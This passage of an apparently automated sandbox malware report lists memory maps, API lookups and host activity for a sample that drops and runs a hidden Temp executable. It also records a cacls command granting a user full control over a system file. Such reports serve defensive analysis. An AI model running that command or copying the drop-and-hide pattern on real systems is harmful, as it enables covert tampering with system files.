| private_0x0000000000060000 | 0x00060000 | 0x0009ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000a0000 | 0x000a0000 | 0x0019ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x001b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001c1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001d0000 | 0x001d0000 | 0x0020ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000210000 | 0x00210000 | 0x00210fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000220000 | 0x00220000 | 0x0022ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000230000 | 0x00230000 | 0x003cffff | Private Memory | rw |
|
|
|
- |
| imm32.dll | 0x00230000 | 0x00259fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000230000 | 0x00230000 | 0x0026ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002d0000 | 0x002d0000 | 0x003cffff | Private Memory | rw |
|
|
|
- |
| qry2vco2.exe | 0x00400000 | 0x00476fff | Memory Mapped File | rwx |
|
|
|
- |
| locale.nls | 0x00480000 | 0x0053dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000540000 | 0x00540000 | 0x0063ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000640000 | 0x00640000 | 0x0078ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000790000 | 0x00790000 | 0x00917fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000920000 | 0x00920000 | 0x00aa0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000ab0000 | 0x00ab0000 | 0x01eaffff | Pagefile Backed Memory | r |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x74220000 | 0x742b1fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x742f0000 | 0x742f7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x74ab0000 | 0x74abbfff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x74da0000 | 0x74de3fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x74df0000 | 0x74f0ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x74f10000 | 0x74f3afff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x75030000 | 0x7517cfff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x75180000 | 0x7518efff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x75310000 | 0x766cefff | Memory Mapped File | rwx |
|
|
|
- |
| comdlg32.dll | 0x766d0000 | 0x7678dfff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x76790000 | 0x76c6cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x76c70000 | 0x76daffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x77260000 | 0x772a3fff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x77300000 | 0x7738cfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x77390000 | 0x77549fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x77550000 | 0x775cafff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007feb0000 | 0x7feb0000 | 0x7ffaffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffd8000 | 0x7ffd8000 | 0x7ffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ffc57b4ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (11)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIIHMN~1\AppData\Local\Temp\qRY2vco264.exe | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Get Info | C:\Users\CIIHMN~1\AppData\Local\Temp\qRY2vco264.exe | type = file_type |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Write | C:\Users\CIIHMN~1\AppData\Local\Temp\qRY2vco264.exe | size = 225280 |
|
1 | |
| Write | C:\Users\CIIHMN~1\AppData\Local\Temp\qRY2vco264.exe | size = 1168 |
|
1 | |
| Delete | C:\Users\CIIHMN~1\AppData\Local\Temp\qRY2vco264.exe | - |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIIHMN~1\AppData\Local\Temp\qRY2vco264.exe | os_pid = 0x950, show_window = SW_HIDE |
|
1 |
Module (165)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | KERNEL32.DLL | base_address = 0x74f40000 |
|
1 | |
| Load | ADVAPI32.dll | base_address = 0x77550000 |
|
1 | |
| Load | COMDLG32.dll | base_address = 0x766d0000 |
|
1 | |
| Load | GDI32.dll | base_address = 0x75030000 |
|
1 | |
| Load | USER32.dll | base_address = 0x76c70000 |
|
1 | |
| Load | VERSION.dll | base_address = 0x742f0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x74f40000 |
|
2 | |
| Get Handle | mscoree.dll | - |
|
1 | |
| Get Filename | - | process_name = c:\users\ciihmnxmn6ps\desktop\qry2vco2.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\Desktop\qRY2vco2.exe, size = 260 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEvent, address_out = 0x74f660c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForSingleObject, address_out = 0x74f66110 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeviceIoControl, address_out = 0x74f587e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DuplicateHandle, address_out = 0x74f65f30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FormatMessageW, address_out = 0x74f64a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventW, address_out = 0x74f65fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateProcessW, address_out = 0x74f5a510 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExpandEnvironmentStringsW, address_out = 0x74f5c8c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDriveTypeW, address_out = 0x74f66300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemDirectoryW, address_out = 0x74f59a90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteFileW, address_out = 0x74f661b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadErrorMode, address_out = 0x74f5fae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapSize, address_out = 0x77704f40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringW, address_out = 0x74f59a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStringTypeW, address_out = 0x74f579b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateThread, address_out = 0x74f5fcb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OpenProcess, address_out = 0x74f592b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetVersion, address_out = 0x74f5a300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateFileW, address_out = 0x74f66180 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindResourceW, address_out = 0x74f63a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SizeofResource, address_out = 0x74f58cb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseHandle, address_out = 0x74f65f20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetLastError, address_out = 0x74f52af0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadResource, address_out = 0x74f578f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x74f52db0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x74f52da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LockResource, address_out = 0x74f57a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCommandLineW, address_out = 0x74f5a4b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleW, address_out = 0x74f59660 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryW, address_out = 0x74f5a0b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStdHandle, address_out = 0x74f5a060 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalFree, address_out = 0x74f587c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalAlloc, address_out = 0x74f58840 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcAddress, address_out = 0x74f57940 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleFileNameW, address_out = 0x74f59560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleScreenBufferInfo, address_out = 0x74f669c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileType, address_out = 0x74f66390 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OutputDebugStringW, address_out = 0x74f81c30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleW, address_out = 0x74f668e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteConsoleW, address_out = 0x74f66920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFilePointerEx, address_out = 0x74f66540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnterCriticalSection, address_out = 0x776f5e80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LeaveCriticalSection, address_out = 0x776f5e00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetStdHandle, address_out = 0x74f826a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x776eda90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EncodePointer, address_out = 0x7770f190 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DecodePointer, address_out = 0x7770a200 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitProcess, address_out = 0x74f674f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleExW, address_out = 0x74f59fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = MultiByteToWideChar, address_out = 0x74f52d60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WideCharToMultiByte, address_out = 0x74f575a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x74f525e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleMode, address_out = 0x74f66870 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleInputA, address_out = 0x74f668c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleMode, address_out = 0x74f66900 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThread, address_out = 0x74f59700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThreadId, address_out = 0x74f51b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitThread, address_out = 0x77712570 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryExW, address_out = 0x74f57920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteCriticalSection, address_out = 0x77709920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushFileBuffers, address_out = 0x74f662a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteFile, address_out = 0x74f66590 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleCP, address_out = 0x74f66860 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x74f5a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x74f59680 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadFile, address_out = 0x74f664a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStartupInfoW, address_out = 0x74f5a080 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = UnhandledExceptionFilter, address_out = 0x74f828e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetUnhandledExceptionFilter, address_out = 0x74f5a2c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionAndSpinCount, address_out = 0x74f66020 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Sleep, address_out = 0x74f577b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateProcess, address_out = 0x74f5fbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsAlloc, address_out = 0x74f59a70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsGetValue, address_out = 0x74f51ba0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsSetValue, address_out = 0x74f51da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsFree, address_out = 0x74f59930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidCodePage, address_out = 0x74f5a090 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetACP, address_out = 0x74f58770 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetOEMCP, address_out = 0x74f5fd10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCPInfo, address_out = 0x74f59fc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x74f57910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = RtlUnwind, address_out = 0x74f59a80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = QueryPerformanceCounter, address_out = 0x74f52dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x74f51d90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemTimeAsFileTime, address_out = 0x74f52b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetEnvironmentStringsW, address_out = 0x74f5a3b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeEnvironmentStringsW, address_out = 0x74f5a0f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapReAlloc, address_out = 0x776ebae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEndOfFile, address_out = 0x74f664f0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetTokenInformation, address_out = 0x7756ed40 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegDeleteKeyW, address_out = 0x7756fca0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupPrivilegeValueW, address_out = 0x775695e0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = AdjustTokenPrivileges, address_out = 0x77570680 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = OpenProcessToken, address_out = 0x7756ee90 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegSetValueExW, address_out = 0x7756f0a0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegQueryValueExW, address_out = 0x7756ed60 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyExW, address_out = 0x7756ed80 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyW, address_out = 0x7756f590 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCreateKeyW, address_out = 0x775706c0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCloseKey, address_out = 0x7756efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupAccountSidW, address_out = 0x7756f7b0 |
|
1 | |
| Get Address | c:\windows\syswow64\comdlg32.dll | function = PrintDlgW, address_out = 0x766dc6a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartPage, address_out = 0x750dee10 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndDoc, address_out = 0x750b55a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartDocW, address_out = 0x750b57e0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = SetMapMode, address_out = 0x750b9590 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = GetDeviceCaps, address_out = 0x750b0820 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndPage, address_out = 0x750dfbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SendMessageW, address_out = 0x76c838f0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = DialogBoxIndirectParamW, address_out = 0x76c9b6b0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = EndDialog, address_out = 0x76c9b430 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = LoadCursorW, address_out = 0x76c87740 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = InflateRect, address_out = 0x76c974e0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetSysColorBrush, address_out = 0x76c9efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetCursor, address_out = 0x76ca4ed0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetWindowTextW, address_out = 0x76c94580 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetDlgItem, address_out = 0x76c91540 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoW, address_out = 0x742f1580 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = VerQueryValueW, address_out = 0x742f1500 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoSizeW, address_out = 0x742f1560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsAlloc, address_out = 0x74f5a330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsFree, address_out = 0x74f5f400 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsGetValue, address_out = 0x74f57580 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsSetValue, address_out = 0x74f59910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x74f66030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventExW, address_out = 0x74f65f90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x74f65ff0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x74f5a5d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x74f5a690 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x776e40f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x776dd630 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x776decf0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x74f65720 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolWait, address_out = 0x776de140 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x776deb60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x77719990 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x77715540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x77709dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x74f5a550 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x74f80a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x752c0790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x74f5f8a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CompareStringEx, address_out = 0x74f5fa30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDateFormatEx, address_out = 0x74f81030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x74f5a000 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTimeFormatEx, address_out = 0x74f814b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x74f5a4f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidLocaleName, address_out = 0x74f816f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringEx, address_out = 0x74f59970 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentPackageId, address_out = 0x75243c90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount64, address_out = 0x74f58710 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsWow64Process, address_out = 0x74f596e0 |
|
1 |
System (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2019-01-23 14:12:37 (UTC) |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Process #165: cacls.exe
0
0
| Information | Value |
|---|---|
| ID | #165 |
| File Name | c:\windows\syswow64\cacls.exe |
| Command Line | cacls "C:\Program Files\Windows Journal\en-US\PDIALOG.exe.mui" /E /G CIiHmnxMn6Ps:F /C |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:05, Reason: Child Process |
| Unmonitor | End Time: 00:03:11, Reason: Self Terminated |
| Monitor Duration | 00:00:06 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xb38 |
| Parent PID | 0xec8 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
B70
0x
5E0
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000090000 | 0x00090000 | 0x000affff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000090000 | 0x00090000 | 0x0009ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000000a0000 | 0x000a0000 | 0x000a3fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000b0000 | 0x000b0000 | 0x000b1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000b0000 | 0x000b0000 | 0x000b3fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000000c0000 | 0x000c0000 | 0x000d3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000000e0000 | 0x000e0000 | 0x0011ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000120000 | 0x00120000 | 0x0015ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000160000 | 0x00160000 | 0x00163fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000170000 | 0x00170000 | 0x00170fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000180000 | 0x00180000 | 0x00181fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000190000 | 0x00190000 | 0x001affff | Private Memory | rw |
|
|
|
- |
| cacls.exe.mui | 0x00190000 | 0x00191fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000001a0000 | 0x001a0000 | 0x001affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001b0000 | 0x001b0000 | 0x001bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x004affff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x001c0000 | 0x0027dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000280000 | 0x00280000 | 0x002bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002c0000 | 0x002c0000 | 0x002fffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003b0000 | 0x003b0000 | 0x004affff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x004b0000 | 0x007e6fff | Memory Mapped File | r |
|
|
|
- |
| cacls.exe | 0x01040000 | 0x01049fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000001050000 | 0x01050000 | 0x0504ffff | Pagefile Backed Memory | - |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
